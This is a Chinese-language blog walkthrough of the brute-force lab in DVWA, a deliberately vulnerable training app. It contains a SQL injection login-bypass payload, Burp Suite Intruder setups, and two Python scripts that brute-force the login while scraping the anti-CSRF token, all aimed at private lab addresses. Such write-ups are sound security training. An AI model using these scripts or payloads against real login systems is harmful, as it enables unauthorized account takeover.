<!DOCTYPE html>


<html lang="en">
  

    <head>
      <meta charset="utf-8" />
        
      <meta
        name="viewport"
        content="width=device-width, initial-scale=1, maximum-scale=1"
      />
      <title>Brute Force |  云芽的博客</title>
  <meta name="generator" content="hexo-theme-ayer">
      
      <link rel="shortcut icon" href="/favicon.ico" />
       
<link rel="stylesheet" href="/dist/main.css">

      <link
        rel="stylesheet"
        href="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/css/remixicon.min.css"
      />
      
<link rel="stylesheet" href="/css/custom.css">
 
      <script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>
       
 

      <link
        rel="stylesheet"
        href="https://cdn.jsdelivr.net/npm/@sweetalert2/theme-bulma@5.0.1/bulma.min.css"
      />
      <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11.0.19/dist/sweetalert2.min.js"></script>

      <!-- mermaid -->
      
      <style>
        .swal2-styled.swal2-confirm {
          font-size: 1.6rem;
        }
      </style>
    <link rel="alternate" href="/atom.xml" title="云芽的博客" type="application/atom+xml">
</head>
  </html>
</html>


<body>
  <div id="app">
    
      <canvas class="fireworks"></canvas>
      <style>
        .fireworks {
          position: fixed;
          left: 0;
          top: 0;
          z-index: 99999;
          pointer-events: none;
        }
      </style>
      
      
    <main class="content on">
      <section class="outer">
  <article
  id="post-DVWA通关指南/Brute-Force"
  class="article article-type-post"
  itemscope
  itemprop="blogPost"
  data-scroll-reveal
>
  <div class="article-inner">
    
    <header class="article-header">
       
<h1 class="article-title sea-center" style="border-left:0" itemprop="name">
  Brute Force
</h1>
 

      
    </header>
     
    <div class="article-meta">
      <a href="/2022/02/07/DVWA%E9%80%9A%E5%85%B3%E6%8C%87%E5%8D%97/Brute-Force/" class="article-date">
  <time datetime="2022-02-07T13:21:26.000Z" itemprop="datePublished">2022-02-07</time>
</a> 
  <div class="article-category">
    <a class="article-category-link" href="/categories/DVWA%E9%80%9A%E5%85%B3%E6%8C%87%E5%8D%97/">DVWA通关指南</a>
  </div>
  
<div class="word_count">
    <span class="post-time">
        <span class="post-meta-item-icon">
            <i class="ri-quill-pen-line"></i>
            <span class="post-meta-item-text"> Word count:</span>
            <span class="post-count">2.6k</span>
        </span>
    </span>

    <span class="post-time">
        &nbsp; | &nbsp;
        <span class="post-meta-item-icon">
            <i class="ri-book-open-line"></i>
            <span class="post-meta-item-text"> Reading time≈</span>
            <span class="post-count">10 min</span>
        </span>
    </span>
</div>
 
    </div>
      
    <div class="tocbot"></div>




  
    <div class="article-entry" itemprop="articleBody">
       
  <h3 id="Brute-Force（暴力破解）"><a href="#Brute-Force（暴力破解）" class="headerlink" title="Brute Force（暴力破解）"></a>Brute Force（暴力破解）</h3><p>暴力破解是通过枚举获取管理员的账号和密码，在实际的操作中一般用来破解后台管理系统的登录。</p>
<p><strong>题目</strong>：</p>
<img src="/images/image-20220207213119524.png" alt="image-20220207213119524" style="zoom:50%;" />

<h4 id="low"><a href="#low" class="headerlink" title="low"></a>low</h4><p><strong>解题</strong>：</p>
<p>方法一：字典爆破</p>
<p>任意输入username和password用burpsuite进行抓包，右击选择send to intruder后进入界面进行设置</p>
<p>第一个界面Target，填写网站ip和port，如果是https勾选上选框（一般抓包后不需要额外设置）</p>
<p>第二个界面Positions ，先说下面的http报文，这里是要选择攻击的位置，把要攻击的字段选中，比如username后面的1就前后用$包起来</p>
<p>我们这里是对用户登陆页面进行一个暴破，所以这里我们选择Cluster Bomb，分别建立用户的字典和密码的字典</p>
<p>第三个界面Payloads，设置payload set为2（position数量）和payload type为simple list，导入对应字典，点击start attack进行攻击，最后观察length长度进行判断，长度不同的即为正确的账号和密码</p>
<p>方法二：sql注入（待理解）</p>
<pre><code>select * from table where username= and password =
select password from table where username =
</code></pre>
<p>第一种就直接将用户名和密码作为条件查询是否存在<br>第二种是将输入的用户名查询出密码再进行密码的比较</p>
<p>本题采用第一种情况即最简单的注入就成功了，但这里要注意的是admin‘ or 1=1 # 并不会成功，这里的username类似主键是唯一的，所以它对查询结果的数目做了检测<code>if(\$result&amp;&amp;mysql_num_rows($result)==1)</code>所以上面的方法至少要加上limit 1，admin‘ or 1=1 limit 1#这样就会成功</p>
<h4 id="Medium"><a href="#Medium" class="headerlink" title="Medium"></a>Medium</h4><p>中等等级的暴力破解和低等级的相同，只是低等级的暴力破解可以进行sql注入，而中等级的把其中的字符串给过滤掉了但是操作相同。需要注意的是中级的暴力破解相对来说较慢是因为有个sleep函数，在破解失败后会使程序停止运行两秒。</p>
<h4 id="High"><a href="#High" class="headerlink" title="High"></a>High</h4><p>high级别加入了user_token，每次页面返回数据会给你一个token，下次再去访问的时候必须携带token值才行。</p>
<p>方法一：</p>
<p>因为token值是不断变化的所以抓包工具就用不上了，这时候需要自己写脚本</p>
<p>代码1：</p>
<p>参考链接：<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_26406447/article/details/89464125">https://blog.csdn.net/qq_26406447/article/details/89464125</a></p>
<pre><code>&quot;&quot;&quot;
针对dvwa暴力破解high级别的脚本
&quot;&quot;&quot;

import urllib.request
from lxml import etree


header=&#123;
    &#39;Host&#39;: &#39;192.168.2.205:8331&#39;,
    &#39;User-Agent&#39;: &#39;Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0&#39;,
    &#39;Accept&#39;: &#39;text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8&#39;,
    &#39;Accept-Language&#39;: &#39;zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2&#39;,
    &#39;Referer&#39;: &#39;http://192.168.2.205:8331/&#39;,
    &#39;Connection&#39;: &#39;close&#39;,
    &#39;Cookie&#39;: &#39;PHPSESSID=teekas77m4bogenehmeuek3m65; security=high&#39;
&#125;

def get_content(url):
    global header
    request = urllib.request.Request(url = url, headers=header)
    response = urllib.request.urlopen(request).read().decode(&#39;utf-8&#39;)
    return response

def get_tocken(content):
    html = etree.HTML(content)
    result = html.xpath(&#39;//div[contains(@class,&quot;vulnerable_code_area&quot;)]//input[contains(@type,&quot;hidden&quot;)]/@value&#39;)
    #print(result[0])
    return result[0]

def judge_flag(content):
    flag = &#39;Username and/or password incorrect.&#39;
    if flag in content:
        return False
    return True

def main():
    url =&quot;http://192.168.2.205:8331/vulnerabilities/brute/&quot;
    tocken = get_tocken(get_content(url))

    with open(&#39;username&#39;, &#39;r&#39;) as un:
        username = un.readline()
        while username:
            with open(&#39;password&#39;, &#39;r&#39;) as pw:
                password = pw.readline()
                while password:
                    url = &quot;http://192.168.2.205:8331/vulnerabilities/brute/?username=&quot; + username.strip() + &quot;&amp;password=&quot; + password.strip() + &quot;&amp;Login=Login&amp;user_token=&quot; + tocken + &quot;#&quot;
                    #print(url)
                    content = get_content(url)
                    if judge_flag(content):
                        print(&#39;username:%s  password:%s success!!!&#39; %(username.strip(),password.strip()))
                    tocken = get_tocken(content)
                    password = pw.readline()
            username = un.readline()

    print(&#39;over!&#39;)

if __name__ == &quot;__main__&quot;:
    main()
</code></pre>
<p>代码2：</p>
<p>参考链接：<a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_44717303/article/details/116589478">https://blog.csdn.net/weixin_44717303/article/details/116589478</a></p>
<pre><code class="python">import re
import requests

header1 = &#123;
    &quot;Cookie&quot;: &quot;PHPSESSID=493r4rd6h86v0lue5frn1ohdq5; security=high&quot;  # 复制cookie文件
&#125;

for username in open(&quot;user.txt&quot;):  # 账户
    for password in open(&#39;pass.txt&#39;): # 密码
        token = re.findall(&quot;name=&#39;user_token&#39; value=&#39;(.*?)&#39; /&gt;&quot;,
                           requests.get(&quot;http://192.168.2.25/vulnerabilities/brute/&quot;, headers=header1).text)

        url = &#39;http://192.168.2.25/vulnerabilities/brute/?username=&#39; + username + &#39;&amp;password=&#39; + password + &#39;&amp;Login=Login&amp;user_token=&#39; + \
              token[0]
        url = url.replace(&quot;\n&quot;, &quot;&quot;) #把换行给去掉
        attack = requests.get(url, headers=header1)
        print(&#39;Length =&#39;, len(attack.text), end=&quot; &quot;)
        print(&#39;username =&#39;, username.replace(&quot;\n&quot;, &quot;&quot;), end=&quot; &quot;)
        print(&#39;password =&#39;, password.replace(&quot;\n&quot;, &quot;&quot;))
        # print(token)
</code></pre>
<p>方法二：</p>
<p>参考链接：<a target="_blank" rel="noopener" href="https://baijiahao.baidu.com/s?id=1670263677551865887&amp;wfr=spider&amp;for=pc">https://baijiahao.baidu.com/s?id=1670263677551865887&amp;wfr=spider&amp;for=pc</a></p>
<p>抓包右键send to intrude，选择攻击模式为pitchfock，给要破解的项加上$</p>
<p>在options选项中找到grep-extact，先点refetch response进行刷新后选定token的值复制</p>
<p>找到redirections模块设置允许重定向，选择always</p>
<p>在 Payloads 中，Payload set 1选择Simple list ，将密码字典添加进去；在Payload set 2 中  token 值选择 Recursive grep（递归查询：从response中提取数据 user_token 的，然后去替换我们爆破的值）</p>
<p>把之前复制的token值粘贴到initial payload for first request方框中即添加初始值</p>
<p>点击start attack开始爆破，完成后可以对length排序，排在最前面的很可能是正确的密码。还可以进行如下操作快速找到正确的密码：Options–&gt;Grep–&gt;Match–&gt;添加我们需要的字段</p>
<h4 id="impossible"><a href="#impossible" class="headerlink" title="impossible"></a>impossible</h4><p>加入账号锁定机制，数次登录失败后账号锁定</p>
<p><strong>小知识</strong>：</p>
<p>参考链接：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/wayne-tao/p/11130158.html">https://www.cnblogs.com/wayne-tao/p/11130158.html</a></p>
<p>Attact type有4种类型</p>
<ol>
<li><p>Sniper（狙击手模式）</p>
<p>单一payload和多个position，遍历payload但一次只改变一个position的值</p>
<p>这个模式会使用单一的payload【就是导入字典的payload】组即依次拿字典去替换其中的一列，比如上面我们选中的username和password。这里会保持其中一个为我们的输入值，而字典替换另一个值。它会针对每个position中$$位置设置payload。这种攻击类型适合对常见漏洞中的请求参数单独地进行测试。攻击中的请求总数应该是position数量和payload数量的乘积。</p>
</li>
<li><p>Battering ram（攻城锤模式）</p>
<p>单一payload和多个position，遍历payload且两个position相同位置相同数值</p>
<p>每次用遍历的值替换所有位置（字典有n个值得话就会攻击n次）。它会重复payload并且一次把所有相同的payload放入指定的位置中。这种攻击适合那种需要在请求中把相同的输入放到多个位置的情况。请求的总数是payload组中payload的总数。简单说就是一个playload字典同时应用到多个position中</p>
</li>
<li><p>Pitchfork（叉子模式）</p>
<p>多个payload和多个position，一个position对应一个payload进行各自攻击</p>
<p>这一模式是使用多个payload组。对于定义的位置可以使用不同的payload组。攻击会同步迭代所有的payload组，把payload放入每个定义的位置中。比如：上面的username和password就需要两个字典，同时遍历字典，每次从字典取出的值组成一组数据，进行攻击，当其中任一字典遍历完的时候，攻击就结束，这种攻击类型非常适合那种不同位置中需要插入不同但相关的输入的情况。请求的数量应该是最小的payload组中的payload数量（攻击次数为最短字典长度）</p>
</li>
<li><p>Cluster Bomb（炸弹模式）</p>
<p>多个payload和多个position，一个position对应一个payload进行组合攻击</p>
<p>这种模式会使用多个payload组。每个定义的位置中有不同的payload组。攻击会迭代每个payload组，每种payload组合都会被测试一遍。比如：position中A处有a字典，B处有b字典，则两个字典将会循环搭配组合进行attack处理这种攻击适用于那种位置中需要不同且不相关或者未知的输入的攻击。攻击请求的总数是各payload组中payload数量的乘积。</p>
</li>
</ol>
<p>payload pyte 是你设置的密码表单的使用方式</p>
<ol>
<li><p>simple list：设置指定字符串，或者从多个文件中读取字符串内容</p>
</li>
<li><p>runtime file（运行时文件）：设置从指定文件中按行读取payload</p>
</li>
<li><p>custom iterator（自定义迭代）：可以在不同占位设置不同的payload，从而组合成多个规则的payload</p>
</li>
<li><p>Character substitution（字符串替换）：设置字符替换规则，对内容进行枚举后生成payload</p>
</li>
<li><p>Character substitution表示生成字典的数据集</p>
</li>
<li><p>Case modification（对字母大小写情况替换）：多种——no change 不变；to lower case 小写；to upper case 大写；to propername 首字母大写其他小写；to ProperName 首字母大写其他不变</p>
</li>
<li><p>Recursive grep（递归替换）：用于从服务端提取有效数据的场景，options (grep extract) 中设置正则抽离内容，才能为下一次请求获取数据</p>
</li>
<li><p>Illegal Unicode（不合法的编码）：payloads里用指定的不合法Unicode编码替换字符本身，从这些Payload列表里产生出一个或者多个有效负荷。在尝试回避基于模式匹配的输入验证时，这个有效负荷会有用的</p>
</li>
<li><p>Character blocks（字符串）：生成指定长度模式的字符，边界测试或者缓冲区溢出</p>
</li>
<li><p>Number：根据配置生成数字payload</p>
</li>
<li><p>Dates：根据配置生成日期</p>
</li>
<li><p>Brute forcer：此类 payload生成包含一个指定字符集，所有排列，特定长度的有效载荷，通常用于枚举字典的生成</p>
</li>
<li><p>NullPayloads（空类型）：空字符串 ， 间隔使用 ， 这种负载类型产生的Payload，其值是一个空字符串。在攻击时，需要同样的请求反复被执行，在没有任何修改原始请求的场景下此Payload是非常有用的。它可用于各种攻击，例如cookie的序列分析、应用层Dos、或保活会话令牌是在其它的间歇试验中使用。</p>
</li>
<li><p>Character frobber：依次修改指定字符串每个字符位置的值，测试session的有效性</p>
</li>
<li><p>Bit flipper：payload 按照 bit 修改</p>
</li>
<li><p>Usernamegenerator：用户名生成器</p>
</li>
<li><p>ECB block shuffler：测试基于ecb加密模式的 payload</p>
</li>
<li><p>Extesion-generated：基于插件生成payload</p>
</li>
<li><p>Copy other payload：将其他位置的复制到该位置上</p>
</li>
</ol>
 
      <!-- reward -->
      
      <div id="reword-out">
        <div id="reward-btn">
          Donate
        </div>
      </div>
      
    </div>
    

    <!-- copyright -->
    
    <div class="declare">
      <ul class="post-copyright">
        <li>
          <i class="ri-copyright-line"></i>
          <strong>Copyright： </strong>
          
          Copyright is owned by the author. For commercial reprints, please contact the author for authorization. For non-commercial reprints, please indicate the source.
          
        </li>
      </ul>
    </div>
    
    <footer class="article-footer">
       
<div class="share-btn">
      <span class="share-sns share-outer">
        <i class="ri-share-forward-line"></i>
        分享
      </span>
      <div class="share-wrap">
        <i class="arrow"></i>
        <div class="share-icons">
          
          <a class="weibo share-sns" href="javascript:;" data-type="weibo">
            <i class="ri-weibo-fill"></i>
          </a>
          <a class="weixin share-sns wxFab" href="javascript:;" data-type="weixin">
            <i class="ri-wechat-fill"></i>
          </a>
          <a class="qq share-sns" href="javascript:;" data-type="qq">
            <i class="ri-qq-fill"></i>
          </a>
          <a class="douban share-sns" href="javascript:;" data-type="douban">
            <i class="ri-douban-line"></i>
          </a>
          <!-- <a class="qzone share-sns" href="javascript:;" data-type="qzone">
            <i class="icon icon-qzone"></i>
          </a> -->
          
          <a class="facebook share-sns" href="javascript:;" data-type="facebook">
            <i class="ri-facebook-circle-fill"></i>
          </a>
          <a class="twitter share-sns" href="javascript:;" data-type="twitter">
            <i class="ri-twitter-fill"></i>
          </a>
          <a class="google share-sns" href="javascript:;" data-type="google">
            <i class="ri-google-fill"></i>
          </a>
        </div>
      </div>
</div>

<div class="wx-share-modal">
    <a class="modal-close" href="javascript:;"><i class="ri-close-circle-line"></i></a>
    <p>扫一扫，分享到微信</p>
    <div class="wx-qrcode">
      <img src="//api.qrserver.com/v1/create-qr-code/?size=150x150&data=http://example.com/2022/02/07/DVWA%E9%80%9A%E5%85%B3%E6%8C%87%E5%8D%97/Brute-Force/" alt="微信分享二维码">
    </div>
</div>

<div id="share-mask"></div>  
    </footer>
  </div>

   
  <nav class="article-nav">
    
      <a href="/2022/02/08/DVWA%E9%80%9A%E5%85%B3%E6%8C%87%E5%8D%97/Command-Injection/" class="article-nav-link">
        <strong class="article-nav-caption">上一篇</strong>
        <div class="article-nav-title">
          
            Command Injection
          
        </div>
      </a>
    
    
      <a href="/2022/02/06/upload-labs%E9%80%9A%E5%85%B3%E6%8C%87%E5%8D%97/pass-18~pass-21/" class="article-nav-link">
        <strong class="article-nav-caption">下一篇</strong>
        <div class="article-nav-title">pass-18~pass-21</div>
      </a>
    
  </nav>

   
<!-- valine评论 -->
<div id="vcomments-box">
  <div id="vcomments"></div>
</div>
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/valine@1.4.14/dist/Valine.min.js"></script>
<script>
  new Valine({
    el: "#vcomments",
    app_id: "",
    app_key: "",
    path: window.location.pathname,
    avatar: "monsterid",
    placeholder: "给我的文章加点评论吧~",
    recordIP: true,
  });
  const infoEle = document.querySelector("#vcomments .info");
  if (infoEle && infoEle.childNodes && infoEle.childNodes.length > 0) {
    infoEle.childNodes.forEach(function (item) {
      item.parentNode.removeChild(item);
    });
  }
</script>
<style>
  #vcomments-box {
    padding: 5px 30px;
  }

  @media screen and (max-width: 800px) {
    #vcomments-box {
      padding: 5px 0px;
    }
  }

  #vcomments-box #vcomments {
    background-color: #fff;
  }

  .v .vlist .vcard .vh {
    padding-right: 20px;
  }

  .v .vlist .vcard {
    padding-left: 10px;
  }
</style>

 
   
     
</article>

</section>
      <footer class="footer">
  <div class="outer">
    <ul>
      <li>
        Copyrights &copy;
        2015-2022
        <i class="ri-heart-fill heart_icon"></i> yunya
      </li>
    </ul>
    <ul>
      <li>
        
      </li>
    </ul>
    <ul>
      <li>
        
        
        <span>
  <span><i class="ri-user-3-fill"></i>Visitors:<span id="busuanzi_value_site_uv"></span></span>
  <span class="division">|</span>
  <span><i class="ri-eye-fill"></i>Views:<span id="busuanzi_value_page_pv"></span></span>
</span>
        
      </li>
    </ul>
    <ul>
      
    </ul>
    <ul>
      
    </ul>
    <ul>
      <li>
        <!-- cnzz统计 -->
        
        <script type="text/javascript" src='https://s9.cnzz.com/z_stat.php?id=1278069914&amp;web_id=1278069914'></script>
        
      </li>
    </ul>
  </div>
</footer>    
    </main>
    <div class="float_btns">
      <div class="totop" id="totop">
  <i class="ri-arrow-up-line"></i>
</div>

<div class="todark" id="todark">
  <i class="ri-moon-line"></i>
</div>

    </div>
    <aside class="sidebar on">
      <button class="navbar-toggle"></button>
<nav class="navbar">
  
  <div class="logo">
    <a href="/"><img src="/images/ayer-side.svg" alt="云芽的博客"></a>
  </div>
  
  <ul class="nav nav-main">
    
    <li class="nav-item">
      <a class="nav-item-link" href="/">主页</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/categories">分类</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/friends">友链</a>
    </li>
    
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      
      <a class="nav-item-link nav-item-search"  title="Search">
        <i class="ri-search-line"></i>
      </a>
      
      
      <a class="nav-item-link" target="_blank" href="/atom.xml" title="RSS Feed">
        <i class="ri-rss-line"></i>
      </a>
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
    </aside>
    <div id="mask"></div>

<!-- #reward -->
<div id="reward">
  <span class="close"><i class="ri-close-line"></i></span>
  <p class="reward-p"><i class="ri-cup-line"></i>请我喝杯咖啡吧~</p>
  <div class="reward-box">
    
    <div class="reward-item">
      <img class="reward-img" src="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/img/alipay.jpg">
      <span class="reward-type">支付宝</span>
    </div>
    
    
    <div class="reward-item">
      <img class="reward-img" src="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/img/wechat.jpg">
      <span class="reward-type">微信</span>
    </div>
    
  </div>
</div>
    
<script src="/js/jquery-3.6.0.min.js"></script>
 
<script src="/js/lazyload.min.js"></script>

<!-- Tocbot -->
 
<script src="/js/tocbot.min.js"></script>

<script>
  tocbot.init({
    tocSelector: ".tocbot",
    contentSelector: ".article-entry",
    headingSelector: "h1, h2, h3, h4, h5, h6",
    hasInnerContainers: true,
    scrollSmooth: true,
    scrollContainer: "main",
    positionFixedSelector: ".tocbot",
    positionFixedClass: "is-position-fixed",
    fixedSidebarOffset: "auto",
  });
</script>

<script src="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.js"></script>
<link
  rel="stylesheet"
  href="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.css"
/>
<script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js"></script>

<script src="/dist/main.js"></script>

<!-- ImageViewer -->
 <!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                <!--  Controls are self-explanatory. Order can be changed. -->

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" style="display:none" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div>

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.min.css">
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"></script>

<script>
    function viewer_init() {
        let pswpElement = document.querySelectorAll('.pswp')[0];
        let $imgArr = document.querySelectorAll(('.article-entry img:not(.reward-img)'))

        $imgArr.forEach(($em, i) => {
            $em.onclick = () => {
                // slider展开状态
                // todo: 这样不好，后面改成状态
                if (document.querySelector('.left-col.show')) return
                let items = []
                $imgArr.forEach(($em2, i2) => {
                    let img = $em2.getAttribute('data-idx', i2)
                    let src = $em2.getAttribute('data-target') || $em2.getAttribute('src')
                    let title = $em2.getAttribute('alt')
                    // 获得原图尺寸
                    const image = new Image()
                    image.src = src
                    items.push({
                        src: src,
                        w: image.width || $em2.width,
                        h: image.height || $em2.height,
                        title: title
                    })
                })
                var gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, {
                    index: parseInt(i)
                });
                gallery.init()
            }
        })
    }
    viewer_init()
</script> 
<!-- MathJax -->

<!-- Katex -->

<!-- busuanzi  -->
 
<script src="/js/busuanzi-2.3.pure.min.js"></script>
 
<!-- ClickLove -->

<!-- ClickBoom1 -->

<script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script>

<script src="/js/clickBoom1.js"></script>
 
<!-- ClickBoom2 -->

<!-- CodeCopy -->
 
<link rel="stylesheet" href="/css/clipboard.css">
 <script src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js"></script>
<script>
  function wait(callback, seconds) {
    var timelag = null;
    timelag = window.setTimeout(callback, seconds);
  }
  !function (e, t, a) {
    var initCopyCode = function(){
      var copyHtml = '';
      copyHtml += '<button class="btn-copy" data-clipboard-snippet="">';
      copyHtml += '<i class="ri-file-copy-2-line"></i><span>COPY</span>';
      copyHtml += '</button>';
      $(".highlight .code pre").before(copyHtml);
      $(".article pre code").before(copyHtml);
      var clipboard = new ClipboardJS('.btn-copy', {
        target: function(trigger) {
          return trigger.nextElementSibling;
        }
      });
      clipboard.on('success', function(e) {
        let $btn = $(e.trigger);
        $btn.addClass('copied');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-checkbox-circle-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPIED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-checkbox-circle-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
      clipboard.on('error', function(e) {
        e.clearSelection();
        let $btn = $(e.trigger);
        $btn.addClass('copy-failed');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-time-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPY FAILED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-time-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
    }
    initCopyCode();
  }(window, document);
</script>
 
<!-- CanvasBackground -->

<script>
  if (window.mermaid) {
    mermaid.initialize({ theme: "forest" });
  }
</script>


    
    

  </div>
</body>

</html>